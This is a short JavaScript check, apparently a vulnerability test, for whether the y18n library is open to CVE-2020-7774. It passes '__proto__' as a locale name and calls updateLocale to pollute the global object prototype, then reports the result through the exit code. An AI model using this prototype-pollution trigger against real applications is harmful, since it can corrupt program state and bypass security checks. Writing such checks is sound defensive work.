import Y18n from 'y18n';
const y18n = Y18n();
//var polluted;
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
try {
if(polluted) console.error('Vulnerable to CVE-2020-7774');
process.exit(polluted);
}
catch(e) {
console.log('Not vulnerable to CVE-2020-7774');
process.exit(0);
}
